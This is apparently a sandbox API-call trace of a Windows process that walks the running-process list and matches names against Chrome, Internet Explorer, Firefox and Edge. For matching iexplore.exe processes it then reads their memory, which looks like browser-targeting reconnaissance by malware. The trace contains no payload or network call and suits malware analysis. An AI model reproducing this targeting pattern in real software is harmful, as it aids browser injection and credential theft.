	[0243.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.321] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0243.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.321] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0243.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8bf4
	[0243.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.323] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0243.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.323] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.323] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0243.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.323] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0243.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8bf8
	[0243.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.324] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0243.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.325] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.325] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0243.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.326] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.326] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0243.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8bfc
	[0243.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.327] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0243.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.328] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.328] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0243.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.328] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.329] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0243.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8c00
	[0243.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.340] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0243.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.340] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.340] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0243.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.340] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.341] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0243.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8c04
	[0243.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.341] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0243.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.342] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.342] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0243.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.342] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.342] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0243.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8c08
	[0243.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.343] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0243.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.344] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.344] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0243.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.345] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.346] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0243.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8c0c
	[0243.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.346] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0243.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.347] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.348] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0243.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.348] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.349] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0243.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x8c10
	[0243.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.350] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0243.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.350] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.351] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0243.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.351] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.351] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0243.352] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8c14
	[0243.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.352] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0243.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.353] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.353] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0243.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.354] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.355] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0243.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8c18
	[0243.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.356] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0243.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.356] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.356] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0243.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.357] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8c1c
	[0243.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.358] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.358] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.359] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.359] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.359] NtQueryInformationProcess (in: ProcessHandle=0x8c1c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.359] ReadProcessMemory (in: hProcess=0x8c1c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.359] ReadProcessMemory (in: hProcess=0x8c1c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.360] ReadProcessMemory (in: hProcess=0x8c1c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.360] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8c20
	[0243.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.362] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.362] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.362] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.363] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.363] NtQueryInformationProcess (in: ProcessHandle=0x8c20, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.363] ReadProcessMemory (in: hProcess=0x8c20, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.363] ReadProcessMemory (in: hProcess=0x8c20, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.363] ReadProcessMemory (in: hProcess=0x8c20, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.363] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.363] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8c24
	[0243.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.364] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.365] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.365] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.365] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.365] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0243.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8c28
	[0243.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.366] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0243.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.367] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.367] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0243.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.368] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8c2c
	[0243.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.369] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.370] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.370] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.371] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.372] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8c30
	[0243.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.373] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.374] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.374] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.374] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.375] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8c34
	[0243.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.376] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.379] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.379] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.379] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.379] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.380] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8c38
	[0243.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.380] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.381] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.381] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.381] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.382] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8c3c
	[0243.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.383] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.383] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.383] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.384] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8c40
	[0243.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.385] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.385] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.385] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.386] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.386] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0243.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8c44
	[0243.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.387] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0243.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.387] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.387] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0243.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.388] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.388] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0243.389] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8c48
	[0243.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.389] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.389] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.389] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.390] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
